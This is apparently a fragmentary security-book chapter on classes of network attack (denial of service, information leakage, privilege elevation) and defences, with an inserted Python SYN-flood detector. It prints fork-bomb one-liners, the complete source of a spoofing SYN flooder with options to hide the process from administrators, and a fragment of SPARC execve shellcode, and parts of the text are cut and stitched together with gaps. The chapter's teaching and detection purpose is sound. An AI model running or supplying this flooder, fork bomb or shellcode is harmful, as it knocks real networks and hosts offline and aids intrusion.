Introduction

To properly protect your network, you must be aware of the types of attacks that can be launched against it. This chapter covers the various classes of attack that you may encounter, and gives you ideas on how to protect against them. New exploits are created almost daily, but normally they will fall into one of the classes identified in this chapter. It is important to remember that attacks come from both inside and outside your firewall. This chapter attempts to cover some of the more common attacks, but an entire book could be written on every attack that is out there. Keep this fact in mind as you read through this chapter; do not become comfortable thinking that you are protected from all attacks just because you have taken the precautions mentioned here.

What Are the Classes of Attack?

The classes of attack that are examined in this chapter are denial-of-service, information leakage, file creation, reading, modification and removal, misinformation, special file/database access, and elevation of privileges. Let's start with denial-of-service.

Denial-of-Service

What is a denial-of-service (DoS) attack? A DoS attack takes place when availability to a resource is intentionally blocked or degraded due to maliciousness. In other words, the attack impedes the availability of the resource to its regular authorized users. The attack may concentrate on degrading processes, degrading storage capability, destroying files to render the resource unusable, or shutting down parts of the system or processes. Let's take a closer look at each of these items.

Degrading processes occurs when the attacker reduces performance by overloading the target system, by either spawning multiple processes to eat up all available resources of the host system, or by spawning enough processes to overload the central processing unit (CPU).
Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 68

A simple UNIX fork bomb can be used to degrade processes on a system by recursively spawning copies of itself until the system runs out of process table entries. The fork bomb is easy to implement using the shell or C. The code for shell is: ($0 & $0 &) The code for C is: (main() {for(;;)fork();})

The degrading processes attack can also be directed at a network application, such as File Transfer Protocol (FTP) or Simple Mail Transfer Protocol (SMTP), or at a network service, such as Internet Protocol (IP) or the Internet Control Message Protocol (ICMP). The attacker sends a flood of network requests to the target regardless of whether he or she is attacking a network application or a network service.

Examples of denial-of-service attacks that degrade processes are snork and chargen. Both of these DoSs affect Windows NT boxes (unless Service Pack 4 or higher has been applied). Snork enables the attacker to send spoofed Remote Procedure Call (RPC) datagrams to the User Datagram Protocol (UDP) destination port 135, giving it the appearance that the "attacked" RPC server sent bad data to another RPC server. The second server sends a reject packet back to the "attacked" server that, in turn, replies with another reject packet, thereby creating a loop that is not broken until a packet is dropped, which could take a few minutes. If the spoofed packet is sent to several different computers, then the "attacked" server could waste a considerable amount of processor resources and network bandwidth that otherwise could be used by legitimate network users to accomplish their mission. The chargen DoS functions against Windows NT systems that have the Simple TCP/IP Services installed. Basically, what happens is that a flood of UDP datagrams is sent from a spoofed source IP address to port 19 (the chargen port) to the subnet broadcast address.
Affected Windows NT systems respond to each broadcast, thereby creating a flood of UDP datagrams on the network.

Two more examples of this type of DoS are smurf and the SYN (synchronization) flood. The smurf DoS performs a network-level attack against the target host. However, unlike other DoSs, this attack relies on the intermediary, a router, to help as shown in Figure 3.1. The attacker, spoofing the source IP address of the target host, generates a large amount of ICMP echo traffic directed toward IP broadcast addresses. The router, also known as a smurf amplifier, converts the IP broadcast to a layer 2 broadcast and sends it on its way. Each host that receives the broadcast responds back to the real source IP with an echo reply. Depending on the number of hosts on the network both the router and target host can be inundated with traffic, resulting in degraded network service availability.

Figure 3.1 Diagram of a smurf attack. (Attacker sends ICMP echo packets, from the spoofed source address of the intended victim, through the Internet and a router to a broadcast address; the victim receives all the ICMP echo replies.)

The SYN flood is accomplished by sending Transmission Control Protocol (TCP) connection requests faster than a system can process them. The target system sets aside resources to track each connection, so a great number of incoming SYNs can cause the target host to run out of resources for new legitimate connections. The source IP address is, as usual, spoofed so that when the target system attempts to respond with the second portion of the three-way handshake, a SYN-ACK (synchronization-acknowledgment), it receives no response. Some operating systems will retransmit the SYN-ACK a number of times before releasing the resources back to the system. Here is an example of exploit code written by Zakath that creates a SYN flood.
This SYN flooder allows you to select an address the packets will be spoofed from, as well as the ports to flood on the victim's system. The code is presented here for educational purposes only, and is not to be used to create a DoS on any live networks. This code is available on several Internet sites, so I am not giving away any "secrets" by printing it here.

    /* Syn Flooder by Zakath
     * TCP Functions by trurl_ (thanks man).
     * Some more code by Zakath.
     * Speed/Misc Tweaks/Enhancments -- ultima
     * Nice Interface -- ultima
     * Random IP Spoofing Mode -- ultima
     * How To Use:
     * Usage is simple. srcaddr is the IP the packets will be spoofed from.
     * dstaddr is the target machine you are sending the packets to.
     * low and high ports are the ports you want to send the packets to.
     * Random IP Spoofing Mode: Instead of typing in a source address,
     * just use '0'. This will engage the Random IP Spoofing mode, and
     * the source address will be a random IP instead of a fixed ip.
     * Released: [4.29.97]
     * To compile: cc -o synk4 synk4.c
     *
     */
    #include <signal.h>
    #include <stdio.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/time.h>
    #include <netinet/in.h>
    #include <linux/ip.h>
    #include <linux/tcp.h>

    /* These can be handy if you want to run the flooder while the admin is on
     * this way, it makes it MUCH harder for him to kill your flooder */
    /* Ignores all signals except Segfault */
    // #define HEALTHY
    /* Ignores Segfault */
    // #define NOSEGV
    /* Changes what shows up in ps -aux to whatever this is defined to */
    // #define HIDDEN "vi .cshrc"

    #define SEQ 0x28376839
    #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))

    unsigned long send_seq, ack_seq, srcport;
    char flood = 0;
    int sock, ssock, curc, cnt;

    /* Check Sum */
    unsigned short
    ip_sum (addr, len)
    u_short *addr;
    int len;
    {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;

        while (nleft > 1) {
            sum += *w++;
            nleft -= 2;
        }
        if (nleft == 1) {
            *(u_char *) (&answer) = *(u_char *) w;
            sum += answer;
        }
        sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
        sum += (sum >> 16);                 /* add carry */
        answer = ~sum;                      /* truncate to 16 bits */
        return (answer);
    }

    void sig_exit(int crap)
    {
    #ifndef HEALTHY
        printf("\033[H\033[JSignal Caught. Exiting Cleanly.\n");
        exit(crap);
    #endif
    }

    void sig_segv(int crap)
    {
    #ifndef NOSEGV
        printf("\033[H\033[JSegmentation Violation Caught. Exiting Cleanly.\n");
        exit(crap);
    #endif
    }

    unsigned long getaddr(char *name)
    {
        struct hostent *hep;

        hep=gethostbyname(name);
        if(!hep) {
            fprintf(stderr, "Unknown host %s\n", name);
            exit(1);
        }
        return *(unsigned long *)hep->h_addr;
    }

    void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen)
    {
        char buf[65536];
        struct { /* rfc 793 tcp pseudo-header */
            unsigned long saddr, daddr;
            char mbz;
            char ptcl;
            unsigned short tcpl;
        } ph;
        struct sockaddr_in sin; /* how necessary is this, given that the destination
                                   address is already in the ip header? */

        ph.saddr=ih->saddr;
        ph.daddr=ih->daddr;
        ph.mbz=0;
        ph.ptcl=IPPROTO_TCP;
        ph.tcpl=htons(sizeof(*th)+dlen);
        memcpy(buf, &ph, sizeof(ph));
        memcpy(buf+sizeof(ph), th, sizeof(*th));
        memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen);
        memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4);
        th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1);
        memcpy(buf, ih, 4*ih->ihl);
        memcpy(buf+4*ih->ihl, th, sizeof(*th));
        memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen);
        memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4);
        ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1);
        memcpy(buf, ih, 4*ih->ihl);
        sin.sin_family=AF_INET;
        sin.sin_port=th->dest;
        sin.sin_addr.s_addr=ih->daddr;
        if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin, sizeof(sin))<0) {
            printf("Error sending syn packet.\n"); perror(""); exit(1);
        }
    }

    unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port)
    {
        int i, s;
        struct iphdr ih;
        struct tcphdr th;
        struct sockaddr_in sin;
        int sinsize;
        unsigned short myport=6969;
        char buf[1024];
        struct timeval tv;

        ih.version=4;
        ih.ihl=5;
        ih.tos=0; /* XXX is this normal? */
        ih.tot_len=sizeof(ih)+sizeof(th);
        ih.id=htons(random());
        ih.frag_off=0;
        ih.ttl=30;
        ih.protocol=IPPROTO_TCP;
        ih.check=0;
        ih.saddr=my_ip;
        ih.daddr=their_ip;
        th.source=htons(srcport);
        th.dest=htons(port);
        th.seq=htonl(SEQ);
        th.doff=sizeof(th)/4;
        th.ack_seq=0;
        th.res1=0;
        th.fin=0;
        th.syn=1;
        th.rst=0;
        th.psh=0;
        th.ack=0;
        th.urg=0;
        th.res2=0;
        th.window=htons(65535);
        th.check=0;
        th.urg_ptr=0;
        gettimeofday(&tv, 0);
        send_tcp_segment(&ih, &th, "", 0);
        send_seq = SEQ+1+strlen(buf);
    }

    void upsc()
    {
        int i;
        char schar;
        switch(cnt) {
            case 0: { schar = '|'; break; }
            case 1: { schar = '/'; break; }
            case 2: { schar = '-'; break; }
            case 3: { schar = '\\'; break; }
            case 4: { schar = '|'; cnt = 0; break; }
        }
        printf("\033[H\033[1;30m[\033[1;31m%c\033[1;30m]\033[0m %d", schar, curc);
        cnt++;
        for(i=0; i<26; i++) { i++; curc++; }
    }

    void init_signals()
    {
        // Every Signal known to man. If one gives you an error, comment it out!
        signal(SIGHUP, sig_exit);
        signal(SIGINT, sig_exit);
        signal(SIGQUIT, sig_exit);
        signal(SIGILL, sig_exit);
        signal(SIGTRAP, sig_exit);
        signal(SIGIOT, sig_exit);
        signal(SIGBUS, sig_exit);
        signal(SIGFPE, sig_exit);
        signal(SIGKILL, sig_exit);
        signal(SIGUSR1, sig_exit);
        signal(SIGSEGV, sig_segv);
        signal(SIGUSR2, sig_exit);
        signal(SIGPIPE, sig_exit);
        signal(SIGALRM, sig_exit);
        signal(SIGTERM, sig_exit);
        signal(SIGCHLD, sig_exit);
        signal(SIGCONT, sig_exit);
        signal(SIGSTOP, sig_exit);
        signal(SIGTSTP, sig_exit);
        signal(SIGTTIN, sig_exit);
        signal(SIGTTOU, sig_exit);
        signal(SIGURG, sig_exit);
        signal(SIGXCPU, sig_exit);
        signal(SIGXFSZ, sig_exit);
        signal(SIGVTALRM, sig_exit);
        signal(SIGPROF, sig_exit);
        signal(SIGWINCH, sig_exit);
        signal(SIGIO, sig_exit);
        signal(SIGPWR, sig_exit);
    }

    main(int argc, char **argv)
    {
        int i, x, max, floodloop, diff, urip, a, b, c, d;
        unsigned long them, me_fake;
        unsigned lowport, highport;
        char buf[1024], *junk;

        init_signals();
    #ifdef HIDDEN
        for (i = argc-1; i >= 0; i--) /* Some people like bzero i prefer memset :) */
            memset(argv[i], 0, strlen(argv[i]));
        strcpy(argv[0], HIDDEN);
    #endif
        if(argc<5) {
            printf("Usage: %s srcaddr dstaddr low high\n", argv[0]);
            printf("   If srcaddr is 0, random addresses will be used\n\n\n");
            exit(1);
        }
        if( atoi(argv[1]) == 0 ) urip = 1;
        else me_fake=getaddr(argv[1]);
        them=getaddr(argv[2]);
        lowport=atoi(argv[3]);
        highport=atoi(argv[4]);
        srandom(time(0));
        ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if(ssock<0) {
            perror("socket (raw)");
            exit(1);
        }
        sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
        if(sock<0) {
            perror("socket");
            exit(1);
        }
        junk = (char *)malloc(1024);
        max = 1500;
        i = 1;
        diff = (highport - lowport);
        if (diff > -1) {
            printf("\033[H\033[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved.");
            for (i=1;i>0;i++) {
                srandom((time(0)+i));
                srcport = getrandom(1, max)+1000;
                for (x=lowport;x<=highport;x++) {
                    if ( urip == 1 ) {
                        a = getrandom(0, 255);
                        b = getrandom(0, 255);
                        c = getrandom(0, 255);
                        d = getrandom(0, 255);
                        sprintf(junk, "%i.%i.%i.%i", a, b, c, d);
                        me_fake = getaddr(junk);
                    }
                    spoof_open(/*0xe1e26d0a*/ me_fake, them, x);
                    /* A fair delay. Good for a 28.8 connection */
                    usleep(300);
                    if (!(floodloop = (floodloop+1)%(diff+1))) {
                        upsc(); fflush(stdout);
                    }
                }
            }
        } else {
            printf("High port must be greater than Low port.\n");
            exit(1);
        }
    }

You can detect a SYN flood coming from the preceding code by using a variety of tools such as the netstat command shown in Figure 3.2. On several operating system platforms, using the -n parameter displays addresses and port numbers in numerical format, and the -p switch allows you to select only the protocol you are interested in viewing.
This prevents all UDP connections from being shown so that you can view only the connections you are interested in for this particular attack. Check the man page for the version of netstat that is available on your operating system to ensure that you use the correct switches. Based on the output of netstat, you may decide to use a packet capture utility to do further analysis. Figure 3.3 shows an incoming SYN flood from the "address" 10.40.0.109. Notice in the Time column the rate that the SYN packets are coming in to the target. At the five-second point in the capture, 27 SYN packets are received in one-half second.

Figure 3.2 Using netstat to detect incoming SYN connections.

Figure 3.3 Using a packet capture utility to analyze incoming SYN packets.

Degrading storage capability occurs when the attacker uses all the given storage resources on the target machine, such as by spamming a mail server with either tons of mail and/or attachments till it runs out of storage space. The Love Letter worm has been seen recently within organizations that use Windows NT and Exchange Server as their mail platform. This attack was fairly simple: Visual Basic script replicated itself out to each addressee in the Global Address List each time it was opened (or previewed). For large organizations, it [...]

[...]
    "TCPAllowedPorts"=hex(7):38,30,00,00                 ; http(80)
    "UDPAllowedPorts"=hex(7):35,32,30,00,00              ; rip(520)
    "RawIPAllowedProtocols"=hex(7):36,00,31,37,00,00     ; tcp(6) and udp(17)

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\\Parameters\Tcpip]
    "TCPAllowedPorts"=hex(7):38,30,00,00                 ; http(80)
    "UDPAllowedPorts"=hex(7):35,32,30,00,00              ; rip(520)
    "RawIPAllowedProtocols"=hex(7):36,00,31,37,00,00     ; tcp(6)...
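The detection steps described for the SYN flood (netstat to spot the pile-up of half-open connections, then a packet capture to measure the arrival rate, Figures 3.2 and 3.3) can be automated. The script below is an added example written for this chapter, not code from the book: it counts SYN_RCVD/SYN_RECV entries per remote address in netstat output, and slides a half-second window over tcpdump-style lines to find the densest SYN burst. The netstat lines and capture lines are constructed inline (the 10.40.0.109 source and the 27-SYNs-in-half-a-second burst mirror the chapter's figures; the 192.168.1.x addresses, ports and sequence numbers are made up), and the state names, column layout and tcpdump format are assumptions about those tools' output rather than anything the chapter specifies.

```python
"""Spot a TCP SYN flood in netstat output and in a tcpdump-style capture.

Added example for this chapter's detection discussion, not code from the
book. Both inputs are constructed below so the script runs offline.
"""
import re
from collections import Counter

# Foreign-address column of `netstat -n`, in BSD form (10.40.0.109.1025)
# or Linux form (10.40.0.109:1025).
_ADDR_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})[.:]\d+$")

# A tcpdump line for a bare SYN, e.g.
# 12:00:05.013 IP 10.40.0.109.1025 > 192.168.1.10.80: Flags [S], seq 1, ...
# "Flags [S.]" is the SYN-ACK half of the handshake and is deliberately not matched.
_SYN_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}(?:\.\d+)?) IP (\S+) > \S+: Flags \[S\],")


def half_open_by_source(netstat_text):
    """Count half-open connections (SYN received, handshake never completed)
    per remote address. Accepts `netstat -n -p tcp` (BSD/Solaris, state
    SYN_RCVD) or `netstat -n -t` (Linux, state SYN_RECV) output."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue                       # header or non-TCP line
        if not fields[-1].startswith("SYN_R"):
            continue                       # ESTABLISHED, TIME_WAIT, ... are fine
        m = _ADDR_RE.match(fields[4])
        if m:
            counts[m.group(1)] += 1
    return counts


def flag_syn_sources(netstat_text, threshold=10):
    """[(ip, half_open_count), ...], busiest first, for every remote address
    at or above `threshold`. A few SYN_RCVD entries are normal on a busy
    server; dozens parked on one port from one address are not."""
    return [(ip, n) for ip, n in half_open_by_source(netstat_text).most_common()
            if n >= threshold]


def syn_times_by_source(capture_text):
    """(seconds_since_midnight, source_ip) for every bare SYN in the capture."""
    out = []
    for line in capture_text.splitlines():
        m = _SYN_RE.match(line)
        if not m:
            continue
        secs = int(m.group(1)) * 3600 + int(m.group(2)) * 60 + float(m.group(3))
        out.append((secs, m.group(4).rsplit(".", 1)[0]))   # drop the port suffix
    return out


def peak_syn_rate(capture_text, window=0.5):
    """Slide a `window`-second window over the SYN timestamps and return
    (most_syns_in_any_window, start_of_that_window). Figure 3.3 shows 27 SYNs
    in half a second; that is the kind of burst this measures."""
    times = sorted(t for t, _ in syn_times_by_source(capture_text))
    best, best_start, lo = 0, None, 0
    for hi, t in enumerate(times):
        while times[lo] <= t - window:     # shrink the window from the left
            lo += 1
        if hi - lo + 1 > best:
            best, best_start = hi - lo + 1, times[lo]
    return best, best_start


def build_sample_netstat():
    """Constructed BSD-style netstat output: one healthy SSH session plus 27
    half-open port-80 connections from a single (spoofed) address."""
    lines = ["Active Internet connections",
             "Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)",
             "tcp4       0      0  192.168.1.10.22        192.168.1.55.40112     ESTABLISHED"]
    lines += [f"tcp4       0      0  192.168.1.10.80        10.40.0.109.{1025 + i}       SYN_RCVD"
              for i in range(27)]
    return "\n".join(lines)


def build_sample_capture():
    """Constructed tcpdump-style lines: normal traffic, then 27 SYNs to port 80
    packed into half a second starting at the five-second mark."""
    lines = ["12:00:01.100 IP 192.168.1.55.40112 > 192.168.1.10.22: Flags [S], seq 1000, win 65535, length 0",
             "12:00:01.101 IP 192.168.1.10.22 > 192.168.1.55.40112: Flags [S.], seq 2000, ack 1001, win 65535, length 0",
             "12:00:03.400 IP 192.168.1.77.40500 > 192.168.1.10.80: Flags [S], seq 3000, win 65535, length 0"]
    for i in range(27):
        t = 5.0 + i * 0.018                # 27 SYNs spread over about 0.47 s
        lines.append(f"12:00:{t:06.3f} IP 10.40.0.109.{1025 + i} > 192.168.1.10.80: "
                     f"Flags [S], seq {674592825 + i}, win 65535, length 0")
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, n in flag_syn_sources(build_sample_netstat()):
        print(f"{n:3d} half-open connections from {ip}")
    peak, start = peak_syn_rate(build_sample_capture())
    print(f"peak {peak} SYNs in 0.5 s (window starts at {start:.3f} s since midnight)")
```

The netstat check catches a flood from a fixed spoofed address; a flooder in random-source mode (as the listing above supports) spreads the half-open entries across many addresses, so also watch the total SYN_RCVD count against what the server normally carries. The window scan is the more robust signal because it keys on arrival rate rather than on who the packets claim to be from.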
[...] your network, but you are probably wondering how you can test for these different exploits without affecting the daily operation of your network. That is a good question, because, after all, your goal is to prevent a hacker from exploiting your network, so why do it yourself! What does it matter if you or a hacker [...]

[...] state: closed)

    Port      State   Service
    21/tcp    open    ftp
    23/tcp    open    telnet
    25/tcp    open    smtp
    37/tcp    open    time
    79/tcp    open    finger
    80/tcp    open    http
    110/tcp   open    pop-3
    111/tcp   open    sunrpc
    113/tcp   open    auth
    143/tcp   open    imap2
    513/tcp   open    login
    514/tcp   open    shell
    688/tcp   open    unknown
    2049/tcp  open    nfs

TCP Sequence Prediction: [...]

[...] NIC-NAME to the name of your network interface card (NIC). You can identify it by going to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards and looking for it. In the testing I have done, this does successfully confuse nmap, but your mileage may vary. If you mess up your NT box, don't blame me!

File [...]

[...] happily display the data in the HKEY_USERS and HKEY_LOCAL_MACHINE hives to certain users on the network as shown in Figure 3.6. The information provided in these keys may give someone within your organization all the information she needs [...]

Figure 3.6 Displaying portions of a remote Windows NT system's Registry.
[...] are used on your network. For example, if you are using Windows NT or Windows 9x on your network, unpatched systems are vulnerable to Winnuke. Winnuke sends Out-of-Band data, typically on port 139 (NetBIOS Session Service). For many more reasons than just DoS, port 139 should be closed at your network's border router or firewall. There is no legitimate reason this port should be open to the Internet. If [...]

[...] of your network. Testing for certain categories of exploits can seriously impact the productivity of your network. For these types of attacks, it is often best to compare operating system/service pack versions, as well as date/timestamps of files that are affected by the exploit. This does take more work on your [...]

[...] fingerprint of your operating system if possible. To protect your systems from misinformation, you should use Tripwire and keep your system logs on a protected server to prevent them from being tampered with. LogCheck is useful for notifying you immediately by e-mail of problems and security violations that appear in your logs. Protecting your system's special files consists of blocking ports 135, 137, 138, 139 at [...]

[...] Registry to a public Web site. Of course, you cannot block these ports inside your firewall or your Windows NT network will cease to function. But, remember earlier in the chapter when I mentioned that certain users can open certain hives of Windows NT Workstations? To prevent this from occurring, [...]

Figure 3.9 Tripwire for Linux.
[...]
             "\x91\xd0\x20\x08"   /* execve: */
    /* 24 */ "\x2d\x0b\xd8\x9a"
    /* 28 */ "\xac\x15\xa1\x6e"
    /* 32 */ "\x2f\x0b\xdc\xda"
    /* 36 */ "\x90\x0b\x80\x0e"
    /* 40 */ "\x92\x03\xa0\x08"
    /* 44 */ "\x94\x1b\xc0\x0f"
    /* 48 */ "\x9c\x03\xa0\x10"
    /* 52 */ "\xec\x3b\xbf\xf0"
    /* 56 */ "\xd0\x23\xbf\xf8"
    /* 60 */ "\xc0\x23\xbf\xfc"
    /* 64 */ "\x82\x10\x20\x3b"
    /* 68 */ "\x91\xd0\x20\x08";
    /* xor %o7,%o7,%o0 */ /* mov 27,%g1 [...]